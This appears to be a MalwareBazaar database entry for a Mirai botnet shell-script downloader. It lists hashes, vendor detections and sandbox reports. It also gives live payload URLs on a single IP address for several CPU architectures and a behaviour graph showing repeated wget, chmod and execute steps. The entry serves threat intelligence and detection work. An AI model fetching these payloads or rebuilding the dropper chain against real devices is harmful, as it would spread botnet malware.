MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 838fa050c80d7d90e0681a569f79938d883bd9d0852e2f9df0a3f95b830c57d5. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 5


Intelligence 5 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 838fa050c80d7d90e0681a569f79938d883bd9d0852e2f9df0a3f95b830c57d5
SHA3-384 hash: 98a5b719e5827926d7f56c1810fcb47dcb0a297b4640044e5b2bcf1ef80165350392bf78379cb9ec58bd7e58d070a635
SHA1 hash: 0f4bc7b0d9ffd934b30483b93a3dff8ebba61e32
MD5 hash: 6c2bab0e80979137ab1df9a37e24c359
humanhash: steak-eighteen-oklahoma-yankee
File name:av.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:1'125 bytes
First seen:2025-10-21 15:46:29 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 24:xoWBGhBh9Mk8QoWDp/Vt+/I/V78/7bXszlHEni8atkk0:xoGGhL8QoWZVt+wV78/7TsztEnBat/0
TLSH T1D221BE5AE441A3545D92594C71CBC62DF07BC3ED29C52AD9FC5D2E68F6CC848F032B25
Magika shell
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://23.177.185.39/arm49537740259e5cdb297a1986493143741babec7e71bc6e339e06c3f87c469e93e Miraielf gafgyt mirai ua-wget
http://23.177.185.39/arm5b5f97c4c0ff408de365da6735bf940d1a6a7f7465be68509db8e313f3dcf174f Miraielf gafgyt mirai ua-wget
http://23.177.185.39/arm7ffe536b3d11dd297b8155ecf55695ef88518cc6e35976efed155b6328444bfb5 Miraielf mirai ua-wget
http://23.177.185.39/mips2cae01a9c5ccb06c91d94ba45a9aaec9f804f60f9bf86cdf97daf5ceacae8f4f Mirai32-bit elf gafgyt mirai Mozi
http://23.177.185.39/mpsl9b9764585122f6e0d842fb301963fed0cb6cba5a12740fec2c660d1f636bafd5 Miraielf gafgyt mirai ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
48
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
SecuriteInfo.com.Linux.Downloader-36.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
File Type:
unix shell
First seen:
2025-10-21T13:10:00Z UTC
Last seen:
2025-10-22T10:13:00Z UTC
Hits:
~10
Link:
https://opentip.kaspersky.com/838fa050c80d7d90e0681a569f79938d883bd9d0852e2f9df0a3f95b830c57d5/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/17f08022-d68f-43ee-a144-562d2fcce3b1
Behavior Graph:
Download SVG
%3 guuid=40022e9d-1a00-0000-d6f4-8a98d2090000 pid=2514 /usr/bin/sudo guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520 /tmp/sample.bin guuid=40022e9d-1a00-0000-d6f4-8a98d2090000 pid=2514->guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520 execve guuid=7255f2a8-1a00-0000-d6f4-8a98eb090000 pid=2539 /usr/bin/rm guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=7255f2a8-1a00-0000-d6f4-8a98eb090000 pid=2539 execve guuid=59397ea9-1a00-0000-d6f4-8a98ed090000 pid=2541 /usr/bin/wget net send-data write-file guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=59397ea9-1a00-0000-d6f4-8a98ed090000 pid=2541 execve guuid=b2cca8d6-1a00-0000-d6f4-8a98750a0000 pid=2677 /usr/bin/chmod guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=b2cca8d6-1a00-0000-d6f4-8a98750a0000 pid=2677 execve guuid=8036e2d6-1a00-0000-d6f4-8a98770a0000 pid=2679 /usr/bin/dash guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=8036e2d6-1a00-0000-d6f4-8a98770a0000 pid=2679 clone guuid=4cec58d7-1a00-0000-d6f4-8a987a0a0000 pid=2682 /usr/bin/rm guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=4cec58d7-1a00-0000-d6f4-8a987a0a0000 pid=2682 execve guuid=9eef91d7-1a00-0000-d6f4-8a987c0a0000 pid=2684 /usr/bin/wget net send-data write-file guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=9eef91d7-1a00-0000-d6f4-8a987c0a0000 pid=2684 execve guuid=7b0b9b02-1b00-0000-d6f4-8a98e00a0000 pid=2784 /usr/bin/chmod guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=7b0b9b02-1b00-0000-d6f4-8a98e00a0000 pid=2784 execve guuid=7b03d902-1b00-0000-d6f4-8a98e10a0000 pid=2785 /usr/bin/dash guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=7b03d902-1b00-0000-d6f4-8a98e10a0000 pid=2785 clone guuid=7dc51f04-1b00-0000-d6f4-8a98e50a0000 pid=2789 /usr/bin/rm guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=7dc51f04-1b00-0000-d6f4-8a98e50a0000 pid=2789 execve guuid=15986f04-1b00-0000-d6f4-8a98e60a0000 pid=2790 /usr/bin/wget net send-data write-file guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=15986f04-1b00-0000-d6f4-8a98e60a0000 pid=2790 execve guuid=a4a47f30-1b00-0000-d6f4-8a983e0b0000 pid=2878 /usr/bin/chmod guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=a4a47f30-1b00-0000-d6f4-8a983e0b0000 pid=2878 execve guuid=9978c130-1b00-0000-d6f4-8a98400b0000 pid=2880 /usr/bin/dash guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=9978c130-1b00-0000-d6f4-8a98400b0000 pid=2880 clone guuid=36fd5031-1b00-0000-d6f4-8a98440b0000 pid=2884 /usr/bin/rm guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=36fd5031-1b00-0000-d6f4-8a98440b0000 pid=2884 execve guuid=15bab631-1b00-0000-d6f4-8a98460b0000 pid=2886 /usr/bin/wget net send-data write-file guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=15bab631-1b00-0000-d6f4-8a98460b0000 pid=2886 execve guuid=3552f066-1b00-0000-d6f4-8a98a90b0000 pid=2985 /usr/bin/chmod guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=3552f066-1b00-0000-d6f4-8a98a90b0000 pid=2985 execve guuid=062e8167-1b00-0000-d6f4-8a98aa0b0000 pid=2986 /usr/bin/dash guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=062e8167-1b00-0000-d6f4-8a98aa0b0000 pid=2986 clone guuid=e9a19068-1b00-0000-d6f4-8a98af0b0000 pid=2991 /usr/bin/rm guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=e9a19068-1b00-0000-d6f4-8a98af0b0000 pid=2991 execve guuid=a42adb68-1b00-0000-d6f4-8a98b00b0000 pid=2992 /usr/bin/wget net send-data write-file guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=a42adb68-1b00-0000-d6f4-8a98b00b0000 pid=2992 execve guuid=b13012a8-1b00-0000-d6f4-8a981d0c0000 pid=3101 /usr/bin/chmod guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=b13012a8-1b00-0000-d6f4-8a981d0c0000 pid=3101 execve guuid=f7045da8-1b00-0000-d6f4-8a981e0c0000 pid=3102 /usr/bin/dash guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=f7045da8-1b00-0000-d6f4-8a981e0c0000 pid=3102 clone guuid=30d711a9-1b00-0000-d6f4-8a98210c0000 pid=3105 /usr/bin/busybox guuid=a61cdd9f-1a00-0000-d6f4-8a98d8090000 pid=2520->guuid=30d711a9-1b00-0000-d6f4-8a98210c0000 pid=3105 execve ba55188c-1d8c-531d-84cb-0b022f7a1844 23.177.185.39:80 guuid=59397ea9-1a00-0000-d6f4-8a98ed090000 pid=2541->ba55188c-1d8c-531d-84cb-0b022f7a1844 send: 132B guuid=9eef91d7-1a00-0000-d6f4-8a987c0a0000 pid=2684->ba55188c-1d8c-531d-84cb-0b022f7a1844 send: 132B guuid=15986f04-1b00-0000-d6f4-8a98e60a0000 pid=2790->ba55188c-1d8c-531d-84cb-0b022f7a1844 send: 132B guuid=15bab631-1b00-0000-d6f4-8a98460b0000 pid=2886->ba55188c-1d8c-531d-84cb-0b022f7a1844 send: 132B guuid=a42adb68-1b00-0000-d6f4-8a98b00b0000 pid=2992->ba55188c-1d8c-531d-84cb-0b022f7a1844 send: 132B
Score:
74%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/838fa050c80d7d90e0681a569f79938d883bd9d0852e2f9df0a3f95b830c57d5
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/838fa050c80d7d90e0681a569f79938d883bd9d0852e2f9df0a3f95b830c57d5/
Threat name:
Document-HTML.Downloader.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2025-10-21 15:34:38 UTC
File Type:
Text (Shell)
AV detection:
12 of 24 (50.00%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=qoh2augibv6zbydidjlj66mtrwedxwoqquxc7hpqup4vxaymk7kq._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/251021-s8xscawnbr/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/838fa050c80d7d90e0681a569f79938d883bd9d0852e2f9df0a3f95b830c57d5

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh 838fa050c80d7d90e0681a569f79938d883bd9d0852e2f9df0a3f95b830c57d5

(this sample)

Mirai

elf 35403604031b0ba40bedc373eafa201aeea46ecfcd245f4e8a701d06ad48d252

  
URLhaus
https://urlhaus.abuse.ch/url/3683062/
  
Delivery method
Distributed via web download
  
Dropping
MD5 bbca53259d70928a3235f73da2cef740
  
Dropping
SHA256 35403604031b0ba40bedc373eafa201aeea46ecfcd245f4e8a701d06ad48d252

Comments